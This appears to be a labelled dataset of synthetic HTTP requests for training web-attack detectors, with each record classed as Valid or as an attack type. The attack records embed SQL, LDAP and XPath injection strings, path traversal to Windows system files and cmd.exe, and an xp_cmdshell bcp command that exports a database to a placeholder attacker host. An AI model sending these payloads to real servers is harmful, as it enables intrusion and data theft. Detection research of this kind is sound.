Via: 7.9 215.35.113.94, HTTP/2.6 55.105.73.124, 1.6 www.3obVceoR.htm
Transfer-Encoding: e6iB; tmmbrnnc=hEtmqcs
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 696 84.193.51.16 "ch1tuoo" 
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 590618
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

YLFLLU=?&stiralntr=If7VrcItlaonsafwtl&tlhsmeIeIec4=>Ge&AT=58938508&cTAl81b33D8S=n&hIsCoidove=mBIK8&vtnleo=bf&0tbci2ahEhe=dol&l9oel6y=uAQ@EcS6G&or=p&cnKecho61phpVqS=o0tkGg02y&ekTahNLcd=eh

End - Id: 32688
Start - Id: 2424
class: Valid
GET /uBlA3WVulNaUipZe9/4rlhwpspxiroince/btalbewspfws3s1tv/a9oewEw7rteaxRa/iFadDSsgfSkE/6ieeroMyp/unmceOo3Aliisesdd/cgkt.BXxi8SfCLLBLp/VJQinsertwp-e5CWEIC@5/3t@qj35h9Yc.jpg?lnegzi=774396 HTTP/1.0
Host: 77.71.180.49:80
Connection: ldAaaips
Accept: audio/*
Accept-Charset: x-mac-japanese, big5;q=0.3, iso-8859-5
Accept-Encoding: identity
Accept-Language: s-saln;q=0.0, Oda-rueagq3, idctea-17enpdsx
Cache-Control: max-age=14
Client-ip: 182.119.30.136
Cookie: zdyeqqrv=3;c8cx=7348796567
Cookie2: $Version="593"
Date: Tue, 11 Mar 08 14:06:41 UTC
ETag: "9k0RaHlNgkWC-i0G"
Expect: 100-continue
From: enlhjlne@u3aeaeei.biz
If-Modified-Since: Sun, 09 Jan 05 12:20:10 UTC
If-Unmodified-Since: Tue, 17 Jul 07 16:07:25 CET
If-Match: *
If-None-Match: "CDOZguC7S16OOtuFAcdg"
If-Range: *
Max-Forwards: 83
MIME-Version: 6.0
Pragma: sb='aaya'
Proxy-Authorization: Basic VWhoZ2NoOWc6dnNyVGg=
Authorization: Basic d05lZTppZGF0Vg==
Range: 90-3
Referer: http://jsifnh.org/8te9n/KEjht/ynprkon/saeUduj/v8dIum.html
TE: gzip;q=0.2,deflate
Trailer: Date
User-Agent: 10oa (4CfB_PJ; oNwkXR; lxISuGe; r_iT7k9te)
UA-CPU: Sparc
UA-Disp: 5566,8703,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 213x610
Via: 0.1 www.Smst0ea.tiff:05683, FTP/3.8 www.Eqkiesoi.css
Transfer-Encoding: hWsme; mniJSeD=ittT
Upgrade: tohtr/2.9, 8im/0.4, Looyi/2.2, csa/7.6, tleia/7.4
Warning: 492 www.astoe3u.js "irotdAesefitoeiuos" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 171121523233
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2424
Start - Id: 35900
class: XPathInjection
POST /raonbto3ssnseEaa/otelsgnrCovDgecru4e/6vZ6/8zDFr/l6h/ohwp/ei3/4VFwM/lp9As2gl.gif? HTTP/1.1
Content-Length: 48
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 15:56:36 GMT
Last-Modified: Tue, 11 Jan 05 23:23:05 CET
Host: www.oipe.gov:80
Connection: mvea3t
Accept: */*;q=0.4
Accept-Charset: hz-gb-2312;q=0.3, windows-1253;q=0.6, windows-1252, x-mac-turkish;q=0.5, euc-kr
Accept-Encoding: (i  <  count(ueg/child::text())  and     j <   count(e1onh/child::comment()) and   k  <   count(ere/child::*)     )
Accept-Language: m6i9-1etrrg;q=0.6, tslnA-ietiyxt;q=0.2, r-rpcoot
Cache-Control: only-if-cached
Date: Tue, 23 Aug 05 17:04:12 GMT
If-Unmodified-Since: Thu, 21 Jan 10 14:02:46 CET
If-Match: "47_bSmwh_8pt.QwaA"
If-Range: Tue, 07 Jun 05 09:26:14 UTC
Pragma: kP='reao'
Authorization: NTLM dGlXcVRjc29vdXVrcDl1dGh4dG5rZWhlYW5seXVHUW9ldHlIeWgwbEE=
Referer: http://www.a3ehoc.gov/coQls/ebwGtywe/Gaoi/lama.asmx
Trailer: Upgrade
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 6.5; re-st; rv:2.8.1) Gecko/73387952
Transfer-Encoding: compress

fb2so33li=ecknthjtO5s&ktsebs=bkutlamochadeleter 

End - Id: 35900
Start - Id: 3933
class: Valid
PUT /Cln27hdarnicraolztDr/KscriptK7F/pPj/ht2NU/omswxnarnaet1gaose3.tiff? HTTP/1.1
Content-Length: 165
Content-Language: e0i8ecxz,gmaS5v,nisrCNsR
Content-Encoding: deflate
Content-Location: http://www.uute.be/qata/qrdue1ii/TqAc8a/csgE5u/rVsktt.doc
Content-MD5: ZWdrdHlyZXR3MXFwb3pCdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 22 Aug 09 14:36:39 CET
Last-Modified: Sun, 30 Oct 05 02:04:10 UTC
Host: www.ecrs0a.cz
Connection: close
Accept: text/*, image/jpeg;q=0.7, text/xml;q=0.1
Accept-Charset: windows-1250;q=0.6, iso-8859-5;q=0.6, iso-10646-ucs-2;q=0.8, isiri-3342;q=0.8
Accept-Encoding: compress;q=0.4, identity;q=0.9, identity, compress;q=0.7
Accept-Language: meth-sb;q=0.0, tmEn-nmFajYee;q=0.7, p3sErelr-oete;q=0.4, ddC-nrbh;q=0.1, aiw-rcem2r
Cache-Control: only-if-cached
Client-ip: 130.216.226.250
Cookie: eeaht4neifs=f38xo;NB06jxnor=952;Iiaui=7236;clrtrsskct=otdTaH27;i1agwneon2ta=27842;Harrn=yhg
Cookie2: $Version="806"
Date: Fri, 24 Mar 06 08:32:59 GMT
ETag: W/"8i.GV7A9CbePF-0d"
Expect: 100-continue
From: piNm@lsgw.org
If-Modified-Since: Sun, 02 Dec 07 17:54:47 UTC
If-Unmodified-Since: Fri, 25 Jan 08 15:30:18 CET
If-Match: "kAT1DBb.N6CLnMZhJyS"
If-None-Match: *
If-Range: Wed, 05 Nov 08 21:23:06 GMT
Max-Forwards: 851
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic cmlzaGhoaTo1ZWt3d2VhZA==
Authorization: Basic dGxtZXNkZjpmMDNydA==
Range: -9,-7,885-
Referer: http://cAau.net/sue9Xh/5buNeiei/dbehbqee/fnuelsE.avi
TE: trailers,trailers
Trailer: If-Match
User-Agent: eBdpn/1.7.7.4.1
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 8863x893
Via: 3.0 www.e0jd.gif, HTTP/8.7 36.81.195.69
Transfer-Encoding: 6aouN
Upgrade: nake/5.5
Warning: 598 229.84.156.90 "rerhn" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 43070920922344892051
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9zEnrngAIc=e9d_o&_ZhM=00680&ateDe=s1q51lU&TvJ4xdleGh=vtHl&3ateaigesos22=ut1RnAUa@C6g&FBF1N=314&YFf.Ipi=i2qA&nririHlepcend=nm:WjbhFnservicesig&OaasrdOOm=onwl7o8x_

End - Id: 3933
Start - Id: 38655
class: LdapInjection
GET /rTQtelnetTinhOBchild/oercaTAPtddpytaecpds/eLxs5J8xhXKb5jfC.UY.php4?nx5c1=670&lCserebsl=2ngog%2Fe%27u%26RRn++o&asmeysyt3elXsh=89wuin9trnn3K&oe2nhotqnea8a=sevalhs&lid=lRr&0eni=ii&utfeQ6etsthrd=T%24k6a&aueTeensmhs=671679&op1zbcg=+hi%3CiodNo%29&mochaekLcbody1z.=wv9%29%28%26%28objectClass++%3D+su*%29 HTTP/1.0
Host: 83.92.74.72
Connection: keep-alive
Accept: application/zip;q=0.5, video/*;q=0.9, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ax-hdhMw6s;q=0.1, oar-wdE, nTire2-eN3c;q=0.8, Hiatn-aruS;q=0.0, tii2tr94-e
Client-ip: 228.211.92.51
Cookie2: $Version="47"
ETag: W/"NDTNAThFdSCA-p."
If-Modified-Since: Sun, 04 Jul 04 20:37:06 GMT
If-Unmodified-Since: Fri, 26 Sep 08 12:27:28 UTC
If-Range: Thu, 28 Feb 08 14:52:46 GMT
Max-Forwards: 3
Pragma: no-cache
Authorization: NTLM ZG50MG91dGFlZGFyYzludGxlbm9uZUlJaHVsYzdpZWVzbE92MHJpenNuZ24=
Referer: http://www.ze3uage.st/ear5mia/lfHlfe/afhesba/wiyH.mdb
User-Agent: oeci/1.4.9.2.8

null

End - Id: 38655
Start - Id: 22286
class: Valid
GET /yX-FuE9njJHDtctBNd/Z4/OAw9rte39sklae/joSP@/cr5eQwNsL/troaypitrnH/7BN/ranegn/egC_BzgF/iCeoaizdkobTsnteae.jsp? HTTP/1.1
Host: 44.244.245.213
Connection: adAb6a6
Accept: application/rtf;q=0.9, video/quicktime;q=0.8, video/*
Accept-Charset: ks_c_5601-1987, utf-7;q=0.9, isiri-3342;q=0.7, windows-1257, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=37
Client-ip: 114.15.187.15
Cookie: v1aB8wwchild._M=55460274
Cookie2: $Version="03"
Date: Mon, 28 Feb 05 04:09:42 CET
ETag: W/"D0mjpQdG3YLo7yYuFX"
Expect: 100-continue
From: jrelt@iwvwb.ch
If-Modified-Since: Sun, 24 Jan 10 05:50:15 GMT
If-Unmodified-Since: Thu, 02 Oct 08 06:53:10 UTC
If-Match: *
If-None-Match: "zIaxMO5QZQoSm9s"
If-Range: Thu, 13 Mar 08 17:49:20 CET
Max-Forwards: 52
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bnRxbzplbHNo
Authorization: Basic aTBpcnMzcjpBdHlkZGw1aw==
Range: 379456-,-18,9298-22716
Referer: http://pknNhc4.de/an2cm20.jsp
TE: trailers,chunked,deflate
Trailer: Expect
User-Agent: Mozilla/6.0 (Machintosh; U; PPC 0.1; 8e-de; rv:1.2.2) Gecko/33358620
UA-CPU: 68000
UA-Disp: 0876,9361,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 797x590
Via: 7.4 www.auod.html
Transfer-Encoding: compress
Upgrade: oEtLne/8.4, eiey/8.1, thei/6.7
Warning: 228 172.64.227.11 "cAccunayserl6Fzym6rn" "Wed, 02 Jan 08 09:41:05 UTC"
X-Forwarded-For: 111.239.10.121
X-Serial-Number: 35178476793
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22286
Start - Id: 31803
class: Valid
GET /eGgGsiI93_XP@ns/HLzphpMbX@/rMqDnT.cb06OOWY0dFc/knGirtoeorntcnpodoc/@Uu20iLa_nkKjUhttps/Ktp9m5g5acS3es/0sjorttethztislrvos/ithscmrtlAhhfhi/HGaDI..QOKcVgP/aDlt8dKarcp/xKepvKE/ctWbU-R.gif? HTTP/1.0
Host: www.ld8zA8C.it
Connection: emytea
Accept: application/*;q=0.5, image/png;q=0.6, image/*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=806
Client-ip: 165.169.73.5
Cookie: e6Fea1yRmw=ual;TW-GlEzchildux=sndoqqh\hec;zxsshhspi=vATsehpNnirtItgetcct1
Cookie2: $Version="0"
Date: Mon, 17 Apr 06 06:51:53 CET
ETag: W/"n_ACgNqRABLNRUiRV"
Expect: rystvd0=aetiTegA;hxfr
From: dtdacndA@tAnldhs.uk
If-Modified-Since: Sat, 20 Mar 04 03:23:35 CET
If-Unmodified-Since: Thu, 05 Apr 07 24:52:04 UTC
If-Match: "_xcdd6NWZr-IyL-mOC"
If-None-Match: "PUuewykg2Ry4eGgD"
If-Range: "vMx9DYoB6X2BA_TPeT9U"
Max-Forwards: 98
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic Y0FCdDpib3Ru
Authorization: Digest uri=http://www.zij7oTsi.uk/stbDne/sta6krn/smduQie.msf
Range: -4,-862
Referer: http://2oledesL.fr/wevN/anenfro/sSuAp.php
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.6 (X11; U; Open BSD i586 8.7; 7c-ll; rv:2.8.5) Gecko/29019075
UA-CPU: PowerPC
UA-Disp: 423,7753,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 540x2072
Via: eDioto/4.1 88.103.137.26:4, HTTP/5.2 www.nloo.htm
Transfer-Encoding: identity
Upgrade: reCgm/1.9
Warning: 075 www.tgj5brs.htm "nOEloag30nqnokrne7lo" 
X-Forwarded-For: 68.67.211.15
X-Serial-Number: 995299594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 31803
Start - Id: 6550
class: Valid
POST /fdSC8O3Dfze/g275wWnOIp--U-z5M./6POf2ibYI2Pposition_u/Slraeu/hthfexeauhmoe1aitRL.jpeg? HTTP/1.0
Content-Length: 289
Content-Language: Ou0,Ime
Content-Encoding: identity
Content-Location: /5mEr/03hceea.dll
Content-MD5: dG81YXI3bHNzbjZ5ZG9ldw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Jul 06 19:43:02 GMT
Last-Modified: Mon, 19 Dec 05 18:13:18 CET
Host: www.953Eugi.biz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 242.85.51.243
Cookie: hani=es;eaectrinoaIas=59360
Cookie2: $Version="07"
Date: Fri, 29 Jan 10 14:47:59 UTC
ETag: "P8JP0yasGozdIllJG5G"
Expect: rtIode=sanniu
From: tejqkw@saIase.it
If-Modified-Since: Mon, 16 Feb 04 16:36:03 CET
If-Unmodified-Since: Mon, 09 Nov 09 02:54:06 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 26 Jan 06 21:11:44 UTC
Max-Forwards: 06
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZW5kTnBicml0Y2ZtcmUzczNnYXlpaWZzRU5mZHNybjQ4dXRXZXJodXJ5YzM=
Authorization: NTLM ZFNsdGNsbWhFYm9vbzFndGRjZGlSZXowcDNuNzFhbmlobnJ0
Range: 3879-,44-395
Referer: /2tet/eneet9t/Iraboet/mSNZ.sh
TE: trailers,trailers
Trailer: Warning
User-Agent: noetd/0.5.4.7.5
UA-CPU: x86
UA-Disp: 7851,1243,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 578x446
Via: 6.9 www.iiso.html, xsetn/3.7 236.128.222.70:46960, 7.6 www.lt2es.png:29566
Transfer-Encoding: rrrda3
Upgrade: 2en/5.1, et7a/4.6, 7wuaao/8.1
Warning: 286 92.75.63.163 "lb3nkdrItnzear" 
X-Forwarded-For: 123.178.111.60
X-Serial-Number: 748074315126
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

D5hesgfaeYreteE=\he&WnodeJHZu=gbpsmuitoooe9d7&iowlssf4a6le=i0hm&MwOhnnmtinrxio=isam anncLpasswdeEnpdmaillg&rtOt=alcN_oX_qs&oo3t2ciusi=hgbcWp5i&iq2ir=dphMOnqQJo&osfeu=nccopy+i&XUBXzAc=erWJL4Wtg6&e6=047581&dxeeo9antsaob=gasock_streamn jeeyen5i3&.fYO=979502&a3=nS0HR59bweb6&6z7BDdt=na9tgi

End - Id: 6550
Start - Id: 44068
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 207.92.142.58:2205
Connection: iEnnea
Accept: application/*, text/html;q=0.6
Accept-Charset: iso-10646-ucs-2;q=0.4, windows-1257, iso-8859-6;q=0.1, hz-gb-2312;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: r='ien8yyle'
Client-ip: 103.148.81.42
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="9"
Date: Fri, 23 Jan 09 13:08:52 GMT
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Fri, 12 Mar 04 14:24:55 CET
If-Unmodified-Since: Sat, 12 May 07 06:18:39 CET
If-Match: *
If-None-Match: "Ukr2ID4QLq12l2ytL"
If-Range: *
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: -6,-7
Referer: http://e2pn.be/od5y/o0jer/enqefk.mpeg
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 9.8; bj-os; rv:3.3.4) Gecko/65853872
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: aLaheo/0.2, meI/8.9
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44068
Start - Id: 41229
class: SqlInjection
GET /oltbiiewedszt4rn/wtcndynriAyde87fa/rdaTLL3Z8@YlzjoZ59j/sy1Ayhsc/tDldpnspnnjpgpng6/cebs4sbsox2t/j-z4EGHNw/eTo5WJAqKVIL/link1Z99/N4P.shtml?4Gsmtasnnt=cprocessing-instruction&a8oaoildtF=egroup+byogo&iebsho=OI%25&yrmditthsg=ediXo&stylevPV=p%5C35g+mailcopyeftpthnaeae+s&rYl_=0ta7d9ni&lln1eiesnhgift=rcpo0q&5t64tlqns=ewJRkk&7uMheanpyeuOrL=233920&dol2=41018&erd=r1dh+yanlwp-tt+enodeng&ii1agfsrnzmeV5d=%297&jx=ioAe&h5rtE=206742955&ebonatearlo=%26+perlcfpwd%25node HTTP/1.0
Host: 9.208.116.49
Connection: h1a4qt
Accept: */*;q=0.6
Accept-Charset: koi8-r, hz-gb-2312;q=0.3, utf-8;q=0.0, iso-8859-15;q=0.6, iso-8859-8;q=0.4
Accept-Encoding: select zSf4eRuv    from   ALL_USERS
Accept-Language: *;q=0.4
Cache-Control: w=d9c1q
Client-ip: 206.238.177.255
Cookie: 1Dcngmtni0p=hOlneckstueb;tnacale=ewscriptetT%s;@body0X=33106939;tnaorrir2h=13217
Cookie2: $Version="15"
Date: Mon, 05 Jun 06 05:23:04 GMT
ETag: W/"5ZTrgczviWtaDg7uhH"
Expect: 85nrsds=oapP
From: hsk6aaig@oo1it1ta.gov
If-Modified-Since: Mon, 10 Dec 07 18:48:41 GMT
If-Unmodified-Since: Fri, 25 Dec 09 05:12:57 CET
If-Match: "LVwtOtk52KkbaPTLdU.u"
If-None-Match: "cDeWz8w8GQkyGTttPF"
If-Range: "wIwrjECXd91UJ4s"
Max-Forwards: 042
MIME-Version: 2.3
Pragma: ocst81en='tbnPE'
Proxy-Authorization: Basic aGEwa2hyNDpvZWN0
Authorization: Basic dEF3b2VidDpQeVR1
Referer: /ioeh9m/udmmihs/saaipRud/hfharlu.mpg
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 5.0; ui-cR; rv:2.5.6) Gecko/92398606
UA-CPU: 68000
UA-Disp: 940,2353,32
UA-Color: color16
UA-Pixels: 598x7537
Via: 3.6 82.99.39.106
Transfer-Encoding: deflate
Upgrade: WmdnaR/6.5, nsor/8.1, 4151p/2.5, 0uhl6/4.4, 2wnsz/5.7
X-Forwarded-For: 123.241.252.226
X-Serial-Number: 480673046324930914
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41229
Start - Id: 41150
class: SqlInjection
GET /lfVpgi/tnMvtheos/tT239E.1/q5xeRg-w/g2t1sJ.sx.aspx?ayoanfnn0=sdrOHh&rmExxSB=fnt&u5DcopyZLe=aSigCp4%25nbner%3F&pi8ci=h6ctz%3D&ek=rnhdl&yn98GJn=uluor2gts&myns=racainfcgeh7oo&t5=exec+++++xp_cmdshell+%27bcp++++%22select+++*++++from+++scli%22+++queryout+++++pwdump.exe+-c++-Craw++-Shackersip++++-Usa++-Ph8ck3r%27&uew6n=b5fgnoino%24%40s4shfip&lciMsidxtl30t=7&bdetrx2ls=ooduorenewsoasity HTTP/1.0
Host: 235.175.211.57
Connection: udcrt
Accept: */*;q=0.3
Accept-Charset: x-mac-ce;q=0.1, x-mac-turkish;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: bbnth-enceiH;q=0.9, i82nsn-Epofrenf;q=0.5
Cookie2: $Version="24"
Date: Thu, 09 Oct 08 02:28:58 CET
ETag: "kySf-tR9OR..Mwo"
Expect: 100-continue
If-Modified-Since: Thu, 23 Jun 05 06:19:40 CET
If-Unmodified-Since: Fri, 23 Apr 04 07:04:21 UTC
If-Match: *
If-None-Match: "Kv6gMT@eA1FO14etD0t"
If-Range: Thu, 01 Sep 05 18:42:52 UTC
Max-Forwards: 1034
Range: -024
Referer: http://sash.cz/eohbh/t8alt.cfm
TE: trailers,deflate;q=0.6
User-Agent: rRH2CBGY6W http://www.hgayi.st
UA-OS: Windows 98
Via: HTTP/3.4 www.editeae.shtml, 9.5 www.brdEs.jpg
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41150
Start - Id: 24310
class: Valid
GET /fromJ4unionXGT_Tl3/oKPzzOFgfZ.z8/zkweRenYG/n5KS7/lNSyb2ECG_iTbm3/7ssBbTYq/hK3ET/pdP5Ozxp_u5LTQ/aqbtEtmht5dsaTarsmum.png?llglaeiMaau=9249930 HTTP/1.1
Host: www.nlqbktd.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.8, windows-874, x-mac-icelandic;q=0.6, cp-950, iso-8859-15;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=5
Client-ip: 88.130.110.165
Cookie: tmDi0a0nnpa=obche0rlir
Cookie2: $Version="816"
Date: Wed, 08 Dec 04 18:46:16 UTC
ETag: W/"SiGTqqqgbzI6lKln"
Expect: xbdexcia
From: euoirM@EiaLnegsw.de
If-Modified-Since: Fri, 25 Dec 09 08:51:46 GMT
If-Unmodified-Since: Thu, 05 Jul 07 21:46:47 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 10 Nov 09 14:22:40 UTC
Max-Forwards: 698
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: awes tupa=rsrn
Authorization: Digest nonce
Range: 44522-98,20-5414
Referer: http://www.iFBsn0m.com/EWfu.mp3
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.5 (Windows; U; WinNT 4.1; ie-4o; rv:2.9.2) Gecko/77578125
UA-CPU: 68000
UA-Disp: 6044,928,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 982x566
Via: 8.2 22.104.135.42, 6.2 www.wLst.png:3104
Transfer-Encoding: compress
Upgrade: oim/4.7, Rammnl/5.0, ati/2.2, tbnvY/2.5, ceta/8.2
Warning: 498 85.143.4.214 "roAwsenwaqe" 
X-Forwarded-For: 76.236.144.82
X-Serial-Number: 05617970292195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24310
Start - Id: 36076
class: PathTransversal
GET /Q0VDR/h1Rw3I/iyud/linosrhooaivairNtbob.cgi?apeixoAaftdDmh=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: 228.36.28.183
Connection: rmeelTe
Accept: text/plain, image/*;q=0.6, application/x-tar;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: m-erod
Cache-Control: no-store
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Mon, 24 Jan 05 17:05:21 CET
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: 100-continue
From: Esva@5c4oorIai.it
If-Modified-Since: Wed, 23 May 07 14:38:50 UTC
If-Unmodified-Since: Fri, 24 Dec 04 20:27:33 CET
If-Match: *
If-None-Match: "yf1XiIeeQHcng@K"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: d3iIi=y1in
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: diW0 aiue8nd=tsaL
Range: 67-310757
Referer: /lafr/Fe0iiwul.txt
TE: deflate
Trailer: Warning
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 2.7; lI-pa; rv:7.7.6) Gecko/90751036
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 039x0543
Via: zRvcs/6.3 176.175.36.184
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 082 205.217.116.11 "oJcacgojmdrj" "Sun, 02 Dec 07 19:43:37 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36076
Start - Id: 37310
class: LdapInjection
GET /7GmGhome6QJj6PA2/NoHhtsnu/eIrW/9phpjlhhome@TjdivgOzGg/yMar6QxL/tkdjpQS.jpeg?nrVloaMarw7i=sT%3B-n%3Ahi+vcat&ro7=tambm%3Fq HTTP/1.0
Host: www.hhnfsv.cz:9603
Connection: ceod
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.1, gzip;q=0.4, deflate, deflate, compress;q=0.3
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 181.208.243.92
Cookie: ceibssttsfsrny=3547679198;nrmmetye1E=g|] -;QJKP@=lon1t;rd3oetegnm=ose;yooRb5fTo6rM=tPz;xeyVse.L=964
Cookie2: $Version="1"
Date: Sun, 20 May 07 22:33:08 CET
ETag: "vywb65xZ-PLnJQkW7q"
Expect: mea61lo
From: sorzn@iDilimhi.net
If-Modified-Since: Sat, 26 Mar 05 01:23:47 CET
If-Unmodified-Since: Tue, 09 Mar 10 01:14:17 GMT
If-Match: *
If-None-Match: "tX@zM-ahcTpZHss"
If-Range: Tue, 04 Jan 05 13:00:28 GMT
Max-Forwards: 80
MIME-Version: 4.4
Pragma: bEm2io=gnisltEa
Proxy-Authorization: NTLM ZG9yaG9yb28xb2VocjFzZWVhdHc1OGVlZW90YWRpZGFBRm1kdWxyZXR0b1k=
Authorization: p4orO eae5E1=aoudl
Range: 17-
Referer: http://0rm4tn.st/innee/dm7ea.wav
TE: chunked,deflate;q=0.3,trailers
Trailer: If-Range
User-Agent: 96)(&(objectClass=efc)(|(sn  =    RiIt)(cn=tkf     J*))
UA-CPU: Sparc
UA-Disp: 6088,0787,32
UA-Color: color16
Via: 9.4 www.rsuhsew.png, 4.2 www.oeHiAoh.gif
Transfer-Encoding: gzip
Upgrade: me0rtS/2.5, meFrup/7.5
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37310
Start - Id: 39063
class: LdapInjection
POST /ebtzEslhrRpen6zya/S2FLNBAWbiframe/eA1JBRPuFQyF4LGxkSa/Wv7PXevKrJnull/s7C/aFoSNCEP5tnjB/Vv.nsf? HTTP/1.1
Content-Length: 238
Content-Language: hoiitt2R,1t
Content-Encoding: deflate
Content-Location: /tmeP/aost/irEbh.conf
Content-MD5: Y2Y1NUh2bmhhZXRuem1pZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Dec 09 19:45:37 GMT
Last-Modified: Tue, 31 Jul 07 17:23:27 CET
Host: www.ahde3yl.net
Connection: keep-alive
Accept: application/postscript, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rfl7ezy-deorlc, iT9r-n;q=0.6, 8if-ghnrFd, 5pymbemr-coucLl;q=0.2, rn-iUatj
Cache-Control: max-stale=92375
Client-ip: 239.175.77.189
Cookie: 0EiBC=tnins7hT1mehNsld;iguaeRnsannncr=tf3esrzod;uOanghEbt=eg;gk@SObXa=itnd;iyednahiabil=3680)(&(objectClass=tji)(|(sn  =   hinz)(cn=x9e9    J*));poon=615165
Cookie2: $Version="655"
Date: Tue, 07 Feb 06 08:01:53 UTC
ETag: "oBep5lNTmM_AMif@We"
Expect: icdti
From: ct0nt@neotdaE7.cz
If-Modified-Since: Sun, 11 Jul 04 13:00:55 CET
If-Unmodified-Since: Sun, 28 Nov 04 10:04:10 CET
If-Match: "_Nx3QgkLWtefc34hb"
If-None-Match: "WMixyB.Lt3jeDIv"
If-Range: Wed, 06 Jan 10 20:07:23 CET
Max-Forwards: 140
MIME-Version: 4.2
Pragma: g='egb'
Proxy-Authorization: iheo no4ias=z5scarlf
Authorization: Digest qop=auth
Range: 42453-074211
Referer: http://sdttre.org/t4iehSt/tbaise/hplQAh6t/5Oyet/uowEye.tiff
TE: chunked;q=0.0,trailers,chunked
Trailer: If-Range
User-Agent: eaheKi0cn
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: 3.0 111.22.184.125
